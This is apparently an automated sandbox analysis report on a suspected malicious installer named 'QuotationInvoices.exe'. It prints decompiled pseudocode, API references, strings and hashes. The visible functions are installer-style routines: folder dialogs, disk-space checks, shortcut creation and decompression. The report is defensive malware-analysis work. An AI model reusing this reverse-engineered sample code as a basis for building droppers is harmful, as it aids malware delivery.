CreateThread.KERNEL32(00000000,00000000,Function_00005446,00000000), ref: 00405680
CloseHandle.KERNEL32(00000000), ref: 00405687
ShowWindow.USER32(00000000), ref: 004056AA
ShowWindow.USER32(?,00000008), ref: 004056B1
ShowWindow.USER32(00000008), ref: 004056F7
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040572B
CreatePopupMenu.USER32 ref: 0040573C
AppendMenuA.USER32 ref: 00405751
GetWindowRect.USER32 ref: 00405771
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040578A
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004057C6
OpenClipboard.USER32(00000000), ref: 004057D6
EmptyClipboard.USER32 ref: 004057DC
GlobalAlloc.KERNEL32(00000042,?), ref: 004057E5
GlobalLock.KERNEL32 ref: 004057EF
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405803
GlobalUnlock.KERNEL32(00000000), ref: 0040581C
SetClipboardData.USER32(00000001,00000000), ref: 00405827
CloseClipboard.USER32 ref: 0040582D

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID:
API String ID: 590372296-0
Opcode ID: 6d179e6958cb8dc4fcc0aa3cf4094303a3980cc41fe803e009c8272a4b93c80d
Instruction ID: 3d94e6139f86797c0ae92d92c46aaabaef2c33f238587a010477577dd15b8479
Opcode Fuzzy Hash: 6d179e6958cb8dc4fcc0aa3cf4094303a3980cc41fe803e009c8272a4b93c80d
Instruction Fuzzy Hash: 1BA17C71900608BFDB11AFA1DE45EAE3B79FB08354F40443AFA45B61A0CB754E51DF68

Uniqueness

Uniqueness Score: -1.00%

Function 00404763, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 274
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00404763(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed char _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed char* _t160;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x42a090;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x430000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E0040594D(0x3fb, _t146);
					E00406528(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040594D(0x3fb, _t146);
							if(E00405CD3(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E0040624D(0x429888, _t146);
							_t87 = E00406656(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E0040624D(0x429888, _t146);
								_t89 = E00405C7E(0x429888);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x429888,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x429888) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x429888,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405C2C(0x429888);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160 - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x429888) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404BF7(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x42ec1c; // 0x4bcdc2
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E00404BDF(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x429878);
									} else {
										E00404B1A(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42f504 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E004042F3(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42a8a8 == _t158) {
									E004046BC();
								}
								 *0x42a8a8 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x42a8b8;
							_v60 = E00404AB4;
							_v56 = _t146;
							_v68 = E004062E0(_t146, 0x42a8b8, _t166, 0x429c90, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405BE5(_t146);
								_t125 =  *((intOrPtr*)( *0x42f454 + 0x11c));
								if( *((intOrPtr*)( *0x42f454 + 0x11c)) != 0 && _t146 == "C:\\Users\\jones\\AppData\\Local\\Temp") {
									E004062E0(_t146, 0x42a8b8, _t166, 0, _t125);
									if(lstrcmpiA(0x42e3e0, 0x42a8b8) != 0) {
										lstrcatA(_t146, 0x42e3e0);
									}
								}
								 *0x42a8a8 =  *0x42a8a8 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E00405C52(_t146) != 0 && E00405C7E(_t146) == 0) {
						E00405BE5(_t146);
					}
					 *0x42ec18 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004042D1(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004042D1(_t166);
					E00404306(_t165);
					_t138 = E00406656(8);
					if(_t138 == 0) {
						L53:
						return E00404338(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}

0x00404763
0x00404769
0x0040476f
0x0040477c
0x0040478a
0x0040478d
0x00404795
0x0040479b
0x0040479b
0x004047a7
0x004047aa
0x00404818
0x0040481f
0x004048f6
0x004048fd
0x0040490c
0x0040490c
0x00404910
0x0040491a
0x00404927
0x00404929
0x00404929
0x00404937
0x0040493e
0x00404945
0x00404948
0x0040497f
0x00404981
0x00404987
0x0040498c
0x00404990
0x00404992
0x00404992
0x004049ae
0x00000000
0x004049b0
0x004049b3
0x004049c1
0x004049c7
0x004049c8
0x004049cb
0x004049ce
0x00000000
0x004049ce
0x0040494a
0x0040494c
0x00404950
0x00000000
0x00000000
0x00000000
0x00000000
0x00404952
0x00404952
0x0040495f
0x00404964
0x00000000
0x00000000
0x00404968
0x0040496a
0x0040496a
0x00404972
0x00404974
0x00404977
0x0040497a
0x0040497d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040497d
0x004049da
0x004049e4
0x004049e7
0x004049ea
0x004049f1
0x004049f1
0x004049f3
0x004049f3
0x004049f8
0x004049fa
0x00404a02
0x00404a09
0x00404a0b
0x00404a16
0x00404a16
0x00404a0b
0x00404a1d
0x00404a26
0x00404a30
0x00404a38
0x00404a53
0x00404a3a
0x00404a43
0x00404a43
0x00404a38
0x00404a58
0x00404a5d
0x00404a62
0x00404a6b
0x00404a6b
0x00404a74
0x00404a76
0x00404a76
0x00404a82
0x00404a8a
0x00404a94
0x00404a94
0x00404a99
0x00000000
0x00404a99
0x00404948
0x004048ff
0x00404906
0x00000000
0x00000000
0x00000000
0x00404906
0x00404825
0x0040482e
0x00404848
0x0040484d
0x00404857
0x0040485e
0x0040486a
0x0040486d
0x00404870
0x00404877
0x0040487f
0x00404882
0x00404886
0x0040488d
0x00404895
0x004048ef
0x00404897
0x00404898
0x0040489f
0x004048a9
0x004048b1
0x004048be
0x004048d2
0x004048d6
0x004048d6
0x004048d2
0x004048db
0x004048e8
0x004048e8
0x00404895
0x00000000
0x0040484d
0x0040483b
0x00000000
0x00000000
0x00404841
0x00000000
0x004047ac
0x004047b9
0x004047c2
0x004047cf
0x004047cf
0x004047d6
0x004047dc
0x004047e5
0x004047e8
0x004047eb
0x004047f3
0x004047f6
0x004047f9
0x004047ff
0x00404806
0x0040480d
0x00404a9f
0x00404ab1
0x00404813
0x00404816
0x00000000
0x00404816
0x0040480d

APIs

GetDlgItem.USER32 ref: 004047B2
SetWindowTextA.USER32(00000000,?), ref: 004047DC
SHBrowseForFolderA.SHELL32(?,00429C90,?), ref: 0040488D
CoTaskMemFree.OLE32(00000000), ref: 00404898
lstrcmpiA.KERNEL32(Call,0042A8B8,00000000,?,?), ref: 004048CA
lstrcatA.KERNEL32(?,Call), ref: 004048D6
SetDlgItemTextA.USER32 ref: 004048E8

Part of subcall function 0040594D: GetDlgItemTextA.USER32 ref: 00405960

Part of subcall function 00406528: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\QuotationInvoices.exe" ,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00406580
Part of subcall function 00406528: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040658D
Part of subcall function 00406528: CharNextA.USER32(?,"C:\Users\user\Desktop\QuotationInvoices.exe" ,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00406592
Part of subcall function 00406528: CharPrevA.USER32(?,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 004065A2

GetDiskFreeSpaceA.KERNEL32(00429888,?,?,0000040F,?,00429888,00429888,?,00000001,00429888,?,?,000003FB,?), ref: 004049A6
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004049C1

Part of subcall function 00404B1A: lstrlenA.KERNEL32(0042A8B8,0042A8B8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A35,000000DF,00000000,00000400,?), ref: 00404BB8
Part of subcall function 00404B1A: wsprintfA.USER32 ref: 00404BC0
Part of subcall function 00404B1A: SetDlgItemTextA.USER32 ref: 00404BD3

Strings

A, xrefs: 00404886
C:\Users\user\AppData\Local\Temp, xrefs: 004048B3
Call, xrefs: 004048C4, 004048C9, 004048D4

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Local\Temp$Call
API String ID: 2624150263-3265145871
Opcode ID: 79c2b04a4b296fc05e45a035d0f819eda2b2c317a157a3b831c209e23d1f951a
Instruction ID: b89c9f0b9ad2a5e463b1d4baa2297f7fe0657747611b748bc5d4715ca5df860c
Opcode Fuzzy Hash: 79c2b04a4b296fc05e45a035d0f819eda2b2c317a157a3b831c209e23d1f951a
Instruction Fuzzy Hash: A9A17DB1A00209ABDB11AFA5C941AAF77B8EF84314F14843BF601B62D1DB7C99518F6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040216B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139
comCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E0040216B(void* __eflags) {
				signed int _t55;
				void* _t59;
				intOrPtr* _t63;
				intOrPtr _t64;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t84;
				int _t87;
				intOrPtr* _t95;
				signed int _t105;
				signed int _t109;
				void* _t111;

				 *(_t111 - 0x38) = E00402BCE(0xfffffff0);
				 *(_t111 - 0xc) = E00402BCE(0xffffffdf);
				 *((intOrPtr*)(_t111 - 0x88)) = E00402BCE(2);
				 *((intOrPtr*)(_t111 - 0x34)) = E00402BCE(0xffffffcd);
				 *((intOrPtr*)(_t111 - 0x78)) = E00402BCE(0x45);
				_t55 =  *(_t111 - 0x18);
				 *(_t111 - 0x90) = _t55 & 0x00000fff;
				_t105 = _t55 & 0x00008000;
				_t109 = _t55 >> 0x0000000c & 0x00000007;
				 *(_t111 - 0x74) = _t55 >> 0x00000010 & 0x0000ffff;
				if(E00405C52( *(_t111 - 0xc)) == 0) {
					E00402BCE(0x21);
				}
				_t59 = _t111 + 8;
				__imp__CoCreateInstance(0x408524, _t87, 1, 0x408514, _t59);
				if(_t59 < _t87) {
					L15:
					 *((intOrPtr*)(_t111 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t63 =  *((intOrPtr*)(_t111 + 8));
					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408534, _t111 - 0x30);
					 *((intOrPtr*)(_t111 - 8)) = _t64;
					if(_t64 >= _t87) {
						_t67 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
						if(_t105 == _t87) {
							_t84 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\jones\\AppData\\Local\\Temp");
						}
						if(_t109 != _t87) {
							_t82 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
						}
						_t69 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x74));
						_t95 =  *((intOrPtr*)(_t111 - 0x34));
						if( *_t95 != _t87) {
							_t80 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x90));
						}
						_t71 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x88)));
						_t73 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x78)));
						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x38), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
								_t78 =  *((intOrPtr*)(_t111 - 0x30));
								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
							}
						}
						_t75 =  *((intOrPtr*)(_t111 - 0x30));
						 *((intOrPtr*)( *_t75 + 8))(_t75);
					}
					_t65 =  *((intOrPtr*)(_t111 + 8));
					 *((intOrPtr*)( *_t65 + 8))(_t65);
					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
						_push(0xfffffff4);
					} else {
						goto L15;
					}
				}
				E00401423();
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t111 - 4));
				return 0;
			}

0x00402174
0x0040217e
0x00402188
0x00402195
0x004021a0
0x004021a3
0x004021bd
0x004021c3
0x004021c9
0x004021cc
0x004021d6
0x004021da
0x004021da
0x004021df
0x004021f0
0x004021f8
0x004022d4
0x004022d4
0x004022db
0x004021fe
0x004021fe
0x0040220d
0x00402211
0x00402214
0x0040221a
0x00402228
0x0040222b
0x0040222d
0x00402238
0x00402238
0x0040223d
0x0040223f
0x00402246
0x00402246
0x00402249
0x00402252
0x00402255
0x0040225a
0x0040225c
0x00402269
0x00402269
0x0040226c
0x00402278
0x0040227b
0x00402284
0x0040228a
0x00402291
0x004022aa
0x004022ac
0x004022ba
0x004022ba
0x004022aa
0x004022bd
0x004022c3
0x004022c3
0x004022c6
0x004022cc
0x004022d2
0x004022e7
0x00000000
0x00000000
0x00000000
0x004022d2
0x004022dd
0x00402a5d
0x00402a69

APIs

CoCreateInstance.OLE32(00408524,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00402230

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 123533781-47812868
Opcode ID: 0717a7709797340a5743797a86df642296be39c6595760980035c57ed759ee55
Instruction ID: b205fa0f6c371e5dc37930ac793058e6edb3c03a2887874d4a759486fbbeee3c
Opcode Fuzzy Hash: 0717a7709797340a5743797a86df642296be39c6595760980035c57ed759ee55
Instruction Fuzzy Hash: F5511671A00208AFCB50DFE4CA88E9D7BB6EF48314F2041BAF515EB2D1DA799981CB14

Uniqueness

Uniqueness Score: -1.00%

Function 004027A1, Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E004027A1(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402BCE(2), _t19 - 0x1d0) != 0xffffffff) {
					E004061AB(__edi, _t6);
					_push(_t19 - 0x1a4);
					_push(__esi);
					E0040624D();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x004027b9
0x004027cd
0x004027d8
0x004027d9
0x00402918
0x004027bb
0x004027bb
0x004027bd
0x004027bf
0x004027bf
0x00402a5d
0x00402a69

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B0

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 54e83448eb3b122805b370520c8f42e6cd15468a3f63d6e007e8d611046ccabe
Instruction ID: 52cf83cb61f6f27ed997ed7cc61b6938fc353794e3a771b70e6184720e28d6c0
Opcode Fuzzy Hash: 54e83448eb3b122805b370520c8f42e6cd15468a3f63d6e007e8d611046ccabe
Instruction Fuzzy Hash: B3F0A771604110DFD710EB649A49AEE77689F51314F6005BFF102F21C1D6B849469B3A

Uniqueness

Uniqueness Score: -1.00%

Function 00406A9B, Relevance: .3, Instructions: 334
COMMONCrypto

Download Yara Rule

C-Code - Quality: 79%

			E00406A9B(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E0040720A( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x408408; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x408408; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E00407272( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M004071CA))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x40a420 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
